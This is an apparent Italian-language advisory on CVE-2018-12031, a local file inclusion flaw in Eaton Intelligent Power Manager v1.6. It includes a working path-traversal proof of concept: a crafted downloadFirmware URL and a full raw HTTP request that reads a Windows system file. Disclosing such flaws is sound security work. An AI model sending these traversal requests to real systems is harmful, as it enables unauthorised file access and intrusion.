
CVE-2018-12031 | LFI in Eaton Intelligent Power Manager v1.6 consente a un attaccante di includere un file, può portare alla divulgazione di informazioni sensibili, denial of service ed esecuzione di codice.
L'inclusione locale di file in Eaton Intelligent Power Manager v1.6 consente a un attaccante di includere un file, il che può portare alla divulgazione di informazioni sensibili, denial of service ed esecuzione di codice.
Per sfruttare la vulnerabilità, un attaccante potrebbe utilizzare la richiesta 'https://[HOST]/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../' per ottenere informazioni dal bersaglio.
GET /server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../windows/System32/drivers/etc/host HTTP/1.1
Host: 192.168.45.138:4680
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
